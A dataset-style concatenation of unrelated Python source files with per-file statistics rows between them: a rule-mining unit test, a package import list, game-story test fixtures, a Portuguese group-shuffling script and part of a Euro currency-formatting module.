0.48980977,
0.13287764,
0.63728572,
0.3163273,
0.37061311,
0.52579599,
0.7206465,
0.72623934,
0.0,
0.57660376,
0.0694041,
0.35173438,
0.09158622,
0.74415574,
0.56159659,
0.49068101]
cut_value = sol[len(sol) - 1]
new_sol = sol[:-1]
cut = _cut_point(cut_value, len(self.features))
rule = self.oper.build_rule(new_sol)
# get antecedent and consequent of rule
antecedent = rule[:cut]
consequent = rule[cut:]
self.assertEqual(cut_value, 0.53333333)
self.assertEqual(new_sol, new_sol_a)
self.assertEqual(cut, 4)
self.assertEqual(antecedent, [Feature('Length', 'float', 0.2620357326, 0.4989950842),
Feature('Height', 'float', 0.5636729279999999, 1.13),
None, None])
self.assertEqual(consequent, [None, None,
Feature('Diameter', 'float', 0.34108412769999996, 0.56784007355),
Feature('Sex', 'cat', categories=['I']),
Feature('Viscera weight', 'float', 0.13678483190000001, 0.44964727704)])
| 29.041152 | 118 | 0.482925 | 727 | 7,057 | 4.603851 | 0.181568 | 0.011951 | 0.007171 | 0.021512 | 0.817747 | 0.783089 | 0.757395 | 0.757395 | 0.757395 | 0.757395 | 0 | 0.364336 | 0.410373 | 7,057 | 242 | 119 | 29.161157 | 0.440038 | 0.042511 | 0 | 0.859903 | 0 | 0 | 0.028444 | 0 | 0 | 0 | 0 | 0 | 0.072464 | 1 | 0.024155 | false | 0 | 0.024155 | 0 | 0.057971 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
d0cdc5142df4d73d6b955678e3582948448ab33b | 236 | py | Python | resources/util/toolbox/__init__.py | marrcio/relate-kanji | 1f21892e546194c65f87b42ee45bee706b21ec92 | [
"MIT"
] | null | null | null | resources/util/toolbox/__init__.py | marrcio/relate-kanji | 1f21892e546194c65f87b42ee45bee706b21ec92 | [
"MIT"
] | null | null | null | resources/util/toolbox/__init__.py | marrcio/relate-kanji | 1f21892e546194c65f87b42ee45bee706b21ec92 | [
"MIT"
] | null | null | null | from toolbox.filetools import *
from toolbox.graphictools import *
from toolbox.misctools import *
from toolbox.objecttools import *
from toolbox.webtools import *
from toolbox.kanjitools import *
from toolbox.dataqualitytools import *
| 29.5 | 38 | 0.822034 | 28 | 236 | 6.928571 | 0.357143 | 0.396907 | 0.525773 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.118644 | 236 | 7 | 39 | 33.714286 | 0.932692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
ef6e3b2a58ff7ab71c78722515f32e47818c61c4 | 8,352 | py | Python | tests/unit/story/story_service_data.py | hmajid2301/banter-bus-management-api | d51a40c2d5254d4197cbe5bb84aa576df2c24893 | [
"Apache-2.0"
] | null | null | null | tests/unit/story/story_service_data.py | hmajid2301/banter-bus-management-api | d51a40c2d5254d4197cbe5bb84aa576df2c24893 | [
"Apache-2.0"
] | null | null | null | tests/unit/story/story_service_data.py | hmajid2301/banter-bus-management-api | d51a40c2d5254d4197cbe5bb84aa576df2c24893 | [
"Apache-2.0"
] | null | null | null | from typing import List
from app.game.game_exceptions import GameNotFound
add_story_data = [
(
{
"game_name": "quibly",
"question": "how many fish are there?",
"round": "pair",
"answers": [
{
"nickname": "funnyMan420",
"answer": "one",
"votes": 12341,
},
{
"nickname": "lima_Bean",
"answer": "many",
"votes": 0,
},
],
}
),
(
{
"game_name": "drawlosseum",
"question": "fish",
"nickname": "i_cannotDraw",
"round": "drawing",
"answers": [
{
"start": {
"x": 100,
"y": -100,
},
"end": {
"x": 90,
"y": -100,
},
"color": "#000000",
},
],
}
),
(
{
"game_name": "fibbing_it",
"question": "What do you think about horses?",
"round": "opinion",
"answers": [
{
"answer": "tasty",
"nickname": "!sus",
},
{
"answer": "lame",
"nickname": "!normal_guy",
},
{
"answer": "lame",
"nickname": "normal_guy1",
},
],
}
),
]
add_story_fail_data = [
(
{
"question": "how many fish are there?",
"round": "pair",
"answers": [
{
"nickname": "funnyMan420",
"answer": "one",
"votes": 12341,
},
{
"nickname": "lima_Bean",
"answer": "many",
"votes": 0,
},
],
},
ValueError,
),
(
{
"game_name": "invalid",
"question": "how many fish are there?",
"round": "pair",
"answers": [
{
"nickname": "funnyMan420",
"answer": "one",
"votes": 12341,
},
{
"nickname": "lima_Bean",
"answer": "many",
"votes": 0,
},
],
},
GameNotFound,
),
(
{
"question": "how many fish are there?",
"game_name": "quibly",
"round": "invalid",
"answers": [
{
"nickname": "funnyMan420",
"answer": "one",
"votes": 12341,
},
{
"nickname": "lima_Bean",
"answer": "many",
"votes": 0,
},
],
},
ValueError,
),
(
{
"game_name": "quibly",
"question": "how many fish are there?",
"answers": [
{
"nickname": "funnyMan420",
"answer": "one",
"votes": 12341,
},
{
"nickname": "lima_Bean",
"answer": "many",
"votes": 0,
},
],
},
ValueError,
),
(
{
"round": "pair",
"answers": [
{
"nickname": "funnyMan420",
"answer": "one",
"votes": 12341,
},
{
"nickname": "lima_Bean",
"answer": "many",
"votes": 0,
},
],
},
ValueError,
),
(
{
"round": "pair",
"question": "how many fish are there?",
},
ValueError,
),
(
{
"game_name": "quibly",
"question": "how many fish are there?",
"round": "pair",
"nickname": "hello",
"answers": [
{
"nickname": "funnyMan420",
"answer": "one",
"votes": 12341,
},
{
"nickname": "lima_Bean",
"answer": "many",
"votes": 0,
},
],
},
ValueError,
),
(
{
"game_name": "drawlosseum",
"question": "fish",
"answers": [
{
"start": {
"x": 100,
"y": -100,
},
"end": {
"x": 90,
"y": -100,
},
"color": "#000000",
},
],
},
ValueError,
),
(
{
"nickname": "i_cannotDraw",
"round": "opinion",
"answers": [
{
"answer": "tasty",
"nickname": "!sus",
},
{
"answer": "lame",
"nickname": "!normal_guy",
},
{
"answer": "lame",
"nickname": "normal_guy1",
},
],
},
ValueError,
),
(
{
"game_name": "fibbing_it",
"nickname": "i_cannotDraw",
"round": "invalid",
"answers": [
{
"answer": "tasty",
"nickname": "!sus",
},
{
"answer": "lame",
"nickname": "!normal_guy",
},
{
"answer": "lame",
"nickname": "normal_guy1",
},
],
},
ValueError,
),
(
{
"game_name": "fibbing_it",
"question": "What do you think about horses?",
"round": "opinion",
"nickname": "!sus",
"answers": [
{
"answer": "tasty",
"nickname": "!sus",
},
{
"answer": "lame",
"nickname": "!normal_guy",
},
{
"answer": "lame",
"nickname": "normal_guy1",
},
],
},
ValueError,
),
(
{
"game_name": "fibbing_it",
"question": "What do you think about horses?",
"answers": [
{
"answer": "tasty",
"nickname": "!sus",
},
{
"answer": "lame",
"nickname": "!normal_guy",
},
{
"answer": "lame",
"nickname": "normal_guy1",
},
],
},
ValueError,
),
]
all_games_enabled: List[dict] = [
{
"name": "quibly",
"rules_url": "https://gitlab.com/banter-bus/banter-bus-server/-/wikis/docs/rules/quibly",
"enabled": True,
"description": "A game about quibbing.",
"display_name": "Quibly",
},
{
"name": "fibbing_it",
"rules_url": "https://gitlab.com/banter-bus/banter-bus-server/-/wikis/docs/rules/fibbing_it",
"enabled": True,
"description": "A game about lying.",
"display_name": "Fibbing IT!",
},
{
"name": "drawlosseum",
"rules_url": "https://google.com/drawlosseum",
"enabled": True,
"description": "A game about drawing.",
"display_name": "Drawlosseum",
},
]
| 25.619632 | 101 | 0.287955 | 448 | 8,352 | 5.254464 | 0.185268 | 0.037383 | 0.076466 | 0.101954 | 0.813509 | 0.790569 | 0.726848 | 0.726848 | 0.726848 | 0.726848 | 0 | 0.028603 | 0.573036 | 8,352 | 325 | 102 | 25.698462 | 0.63152 | 0 | 0 | 0.560748 | 0 | 0.006231 | 0.26341 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.006231 | 0 | 0.006231 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ef93c1668ff4f9b514a4b9b32e1482a91a8df8f7 | 3,490 | py | Python | Aulas de JS/exercicios_fora_de_aula/sorteador.py | BEp0/Estudos_Web | 06cdabd482034533c080dc0c7978ba190844edf7 | [
"MIT"
] | null | null | null | Aulas de JS/exercicios_fora_de_aula/sorteador.py | BEp0/Estudos_Web | 06cdabd482034533c080dc0c7978ba190844edf7 | [
"MIT"
] | null | null | null | Aulas de JS/exercicios_fora_de_aula/sorteador.py | BEp0/Estudos_Web | 06cdabd482034533c080dc0c7978ba190844edf7 | [
"MIT"
] | null | null | null | from random import shuffle
print('Sorteador (somente até 8 grupos/pessoas)...')
numero_de_alunos = int(input('Qual a quantidade de grupos para se sortear?'))
#vairáveis para cada estudante/grupo
#se for 2
if numero_de_alunos == 2:
al1 = str(input('Primeiro grupo/estudante: '))# pede o 1° aluno
al2 = str(input('Segundo grupo/estudante: '))# pede o 2° aluno
lista = [al1, al2] # lista os dois
shuffle(lista) # embaralha a lista
print('A ordem dos grupos/estudantes é: {}'.format(lista)) # mostra a lista embaralhada
#se for 3
if numero_de_alunos == 3:
al1 = str(input('Primeiro grupo/estudante: '))# pede o 1° aluno
al2 = str(input('Segundo grupo/estudante: '))# pede o 2° aluno
al3 = str(input('Terceiro grupo/estudante: '))
lista = [al1, al2, al3] # lista os dois
shuffle(lista) # embaralha a lista
print('A ordem dos grupos/estudantes é: {}'.format(lista)) # mostra a lista embaralhada
#se for 4
if numero_de_alunos == 4:
al1 = str(input('Primeiro grupo/estudante: '))# pede o 1° aluno
al2 = str(input('Segundo grupo/estudante: '))# pede o 2° aluno
al3 = str(input('Terceiro grupo/estudante: '))
al4 = str(input('Quarto grupo/estudante: '))
lista = [al1, al2, al3, al4] # lista os dois
shuffle(lista) # embaralha a lista
print('A ordem dos grupos/estudantes é: {}'.format(lista)) # mostra a lista embaralhada
#se for 5
if numero_de_alunos == 5:
al1 = str(input('Primeiro grupo/estudante: '))# pede o 1° aluno
al2 = str(input('Segundo grupo/estudante: '))# pede o 2° aluno
al3 = str(input('Terceiro grupo/estudante: '))
al4 = str(input('Quarto grupo/estudante: '))
al5 = str(input('Quinto grupo/estudante: '))
lista = [al1, al2, al3, al4, al5]
shuffle(lista)
print('A ordem dos grupos/estudantes é: {}'.format(lista))
#se for 6
if numero_de_alunos == 6:
al1 = str(input('Primeiro grupo/estudante: '))# pede o 1° aluno
al2 = str(input('Segundo grupo/estudante: '))# pede o 2° aluno
al3 = str(input('Terceiro grupo/estudante: '))
al4 = str(input('Quarto grupo/estudante: '))
al5 = str(input('Quinto grupo/estudante: '))
al6 = str(input('Sexto grupo/estudante: '))
lista = [al1, al2, al3, al4, al5, al6]
shuffle(lista)
print('A ordem dos grupos/estudantes é: {}'.format(lista))
#se for 7
if numero_de_alunos == 7:
al1 = str(input('Primeiro grupo/estudante: '))# pede o 1° aluno
al2 = str(input('Segundo grupo/estudante: '))# pede o 2° aluno
al3 = str(input('Terceiro grupo/estudante: '))
al4 = str(input('Quarto grupo/estudante: '))
al5 = str(input('Quinto grupo/estudante: '))
al6 = str(input('Sexto grupo/estudante: '))
al7 = str(input('Sétimo grupo/estudante: '))
lista = [al1, al2, al3, al4, al5, al6, al7]
shuffle(lista)
print('A ordem dos grupos/estudantes é: {}'.format(lista))
#se for 8 (último)
if numero_de_alunos == 8:
al1 = str(input('Primeiro grupo/estudante: '))# pede o 1° aluno
al2 = str(input('Segundo grupo/estudante: '))# pede o 2° aluno
al3 = str(input('Terceiro grupo/estudante: '))
al4 = str(input('Quarto grupo/estudante: '))
al5 = str(input('Quinto grupo/estudante: '))
al6 = str(input('Sexto grupo/estudante: '))
al7 = str(input('Sétimo grupo/estudante: '))
al8 = str(input('Oitavo grupo/estudante: '))
lista = [al1, al2, al3, al4, al5, al6, al7, al8]
shuffle(lista)
print('A ordem dos grupos/estudantes é: {}'.format(lista))
print('_FIM_') | 46.533333 | 91 | 0.652436 | 517 | 3,490 | 4.396518 | 0.133462 | 0.123185 | 0.110867 | 0.117026 | 0.856577 | 0.856577 | 0.850418 | 0.842939 | 0.83414 | 0.824021 | 0 | 0.035069 | 0.191117 | 3,490 | 75 | 92 | 46.533333 | 0.765143 | 0.144126 | 0 | 0.716418 | 0 | 0 | 0.408184 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.014925 | 0 | 0.014925 | 0.134328 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
efb659417142ed3ebe31414ca5982bd58e77e72a | 62,899 | py | Python | multicurrency/euro.py | fscm/multicurrency | 5eabdcbfbf427dcafe08d4d05cfce8c9348aeb91 | [
"MIT"
] | 2 | 2021-03-26T18:19:57.000Z | 2021-07-27T01:15:50.000Z | multicurrency/euro.py | fscm/multicurrency | 5eabdcbfbf427dcafe08d4d05cfce8c9348aeb91 | [
"MIT"
] | null | null | null | multicurrency/euro.py | fscm/multicurrency | 5eabdcbfbf427dcafe08d4d05cfce8c9348aeb91 | [
"MIT"
] | null | null | null | # -*- coding: UTF-8 -*-
#
# copyright: 2020-2022, Frederico Martins
# author: Frederico Martins <http://github.com/fscm>
# license: SPDX-License-Identifier: MIT
"""Euro currency representation(s)."""
from decimal import Decimal
from typing import Optional, Union
from .currency import Currency
class Euro(Currency):
"""Euro currency representation.
Simple usage example:
>>> from multicurrency import Euro
>>> euro = Euro(
... amount=123456.789)
>>> print(euro)
123.456,79 €
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2,
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to '.'.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to False.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '.',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = False,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'Euro':
"""Class creator.
Returns:
Euro: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EUR',
numeric_code='978',
symbol='€',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='€',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class EuroSBA(Currency):
"""EuroSBA currency representation.
Simple usage example:
>>> from multicurrency import EuroSBA
>>> eurosba = EuroSBA(
... amount=123456.789)
>>> print(eurosba)
123.456,79 €
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2,
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to '.'.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to False.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '.',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = False,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'EuroSBA':
"""Class creator.
Returns:
EuroSBA: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EUR',
numeric_code='978',
symbol='€',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='€',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class EuroAD(Currency):
"""EuroAD currency representation.
Simple usage example:
>>> from multicurrency import EuroAD
>>> euroad = EuroAD(
... amount=123456.789)
>>> print(euroad)
123.456,79 €
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2,
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to '.'.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to False.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '.',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = False,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'EuroAD':
"""Class creator.
Returns:
EuroAD: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EUR',
numeric_code='978',
symbol='€',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='AD€',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class EuroAT(Currency):
"""EuroAT currency representation.
Simple usage example:
>>> from multicurrency import EuroAT
>>> euroat = EuroAT(
... amount=123456.789)
>>> print(euroat)
€ 123.456,79
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2,
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to '.'.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to True.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '.',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = True,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'EuroAT':
"""Class creator.
Returns:
EuroAT: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EUR',
numeric_code='978',
symbol='€',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='AT€',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class EuroBE(Currency):
"""EuroBE currency representation.
Simple usage example:
>>> from multicurrency import EuroBE
>>> eurobe = EuroBE(
... amount=123456.789)
>>> print(eurobe)
€ 123.456,79
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2,
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to '.'.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to True.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '.',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = True,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'EuroBE':
"""Class creator.
Returns:
EuroBE: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EUR',
numeric_code='978',
symbol='€',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='BE€',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class EuroCY(Currency):
"""EuroCY currency representation.
Simple usage example:
>>> from multicurrency import EuroCY
>>> eurocy = EuroCY(
... amount=123456.789)
>>> print(eurocy)
123.456,79 €
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2,
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to '.'.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to False.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '.',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = False,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'EuroCY':
"""Class creator.
Returns:
EuroCY: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EUR',
numeric_code='978',
symbol='€',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='CY€',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class EuroEE(Currency):
"""EuroEE currency representation.
Simple usage example:
>>> from multicurrency import EuroEE
>>> euroee = EuroEE(
... amount=123456.789)
>>> print(euroee)
123 456,79 €
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2,
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to ' '.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to False.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '\u202F',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = False,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'EuroEE':
"""Class creator.
Returns:
EuroEE: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EUR',
numeric_code='978',
symbol='€',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='EE€',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class EuroFI(Currency):
"""EuroFI currency representation.
Simple usage example:
>>> from multicurrency import EuroFI
>>> eurofi = EuroFI(
... amount=123456.789)
>>> print(eurofi)
123 456,79 €
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2,
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to ' '.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to False.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '\u202F',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = False,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'EuroFI':
"""Class creator.
Returns:
EuroFI: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EUR',
numeric_code='978',
symbol='€',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='FI€',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class EuroFR(Currency):
"""EuroFR currency representation.
Simple usage example:
>>> from multicurrency import EuroFR
>>> eurofr = EuroFR(
... amount=123456.789)
>>> print(eurofr)
123 456,79 €
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2,
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to ' '.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to False.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '\u202F',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = False,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'EuroFR':
"""Class creator.
Returns:
EuroFR: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EUR',
numeric_code='978',
symbol='€',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='FR€',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class EuroDE(Currency):
"""EuroDE currency representation.
Simple usage example:
>>> from multicurrency import EuroDE
>>> eurode = EuroDE(
... amount=123456.789)
>>> print(eurode)
123.456,79 €
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2,
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to '.'.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to False.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '.',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = False,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'EuroDE':
"""Class creator.
Returns:
EuroDE: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EUR',
numeric_code='978',
symbol='€',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='DE€',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class EuroGR(Currency):
"""EuroGR currency representation.
Simple usage example:
>>> from multicurrency import EuroGR
>>> eurogr = EuroGR(
... amount=123456.789)
>>> print(eurogr)
123.456,79 €
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
